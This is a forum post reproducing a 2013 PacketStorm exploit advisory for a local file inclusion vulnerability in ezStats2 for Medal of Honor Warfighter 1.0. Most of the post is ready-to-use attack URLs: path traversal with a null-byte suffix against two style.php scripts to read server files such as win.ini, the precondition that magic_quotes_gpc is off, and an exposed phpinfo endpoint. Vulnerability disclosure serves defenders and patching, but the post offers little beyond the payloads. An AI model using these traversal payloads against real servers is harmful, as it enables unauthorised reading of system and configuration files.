Jump to content
Praetorian503

ezStats2 For Medal Of Honor Warfighter 1.0 Local File Inclusion

Recommended Posts

Posted

ezStats2 for Medal of Honor Warfighter version 1.0 suffers from a local file inclusion vulnerability.

#################################################
### Exploit Title: ezStats2 for Medal of Honor Warfighter v1.0 Local File Inclusion Vulnerability
### Date: 02/05/2013
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://www.ezstats.org/
### Software Link: http://ezstats.googlecode.com/files/ezStats2_MoHW_v1.0a.zip
### Tested on: Linux/Windows
#################################################

http://127.0.0.1/ezStats2_mohw/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg

http://127.0.0.1/ezStats2_mohw/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg

############################################

# Notes :

1- Must be magic_quotes_gpc = Off

2- phpinfo() :

http://127.0.0.1/ezStats2_mohw/admin/apitest.php?info

# Greetz to my friendz

Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...